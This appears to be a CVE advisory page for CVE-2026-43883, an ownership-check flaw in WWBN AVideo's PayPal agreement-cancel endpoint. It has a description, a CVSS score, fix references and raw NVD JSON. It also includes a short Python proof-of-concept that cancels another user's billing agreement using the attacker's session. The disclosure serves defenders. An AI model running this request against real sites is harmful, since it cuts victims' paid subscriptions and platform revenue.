CVE-2026-43883

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/PayPalYPT/agreementCancel.json.php cancels a PayPal billing agreement using an attacker-supplied agreement parameter without verifying that the authenticated user owns the agreement. A low-privilege authenticated user who learns or obtains another user's PayPal billing agreement ID can silently suspend the victim's recurring subscription, causing revenue loss to the platform and loss of paid service to the victim. Commit 0da3dcff1eda2f497694bf82b559829471c292c2 contains an updated fix.

CVSS Details

CVSS Score

4.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable endpoint
# Note: This is a conceptual PoC.
target_url = "https://[target-site]/plugin/PayPalYPT/agreementCancel.json.php"

# Attacker's low-privilege session cookie
attacker_cookies = {
    "PHPSESSID": "[attacker_valid_session_id]",
    "user": "[attacker_user_cookie]"
}

# Victim's PayPal Billing Agreement ID (obtained via enumeration or leakage)
victim_agreement_id = "B-XXXXXXXXXXXXX"

# Data payload to send
payload = {
    "agreement": victim_agreement_id
}

try:
    # Sending the request to cancel the victim's subscription
    response = requests.post(target_url, data=payload, cookies=attacker_cookies)

    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43883
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43883
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43883/
[4] VulDB https://vuldb.com/cve/CVE-2026-43883
[5] https://github.com/WWBN/AVideo/commit/0da3dcff1eda2f497694bf82b559829471c292c2
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-958h-qp3x-q4gj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43883", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.940", "lastModified": "2026-05-11T22:22:12.940", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/PayPalYPT/agreementCancel.json.php cancels a PayPal billing agreement using an attacker-supplied agreement parameter without verifying that the authenticated user owns the agreement. A low-privilege authenticated user who learns or obtains another user's PayPal billing agreement ID can silently suspend the victim's recurring subscription, causing revenue loss to the platform and loss of paid service to the victim. Commit 0da3dcff1eda2f497694bf82b559829471c292c2 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/0da3dcff1eda2f497694bf82b559829471c292c2", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-958h-qp3x-q4gj", "source": "[email protected]"}]}}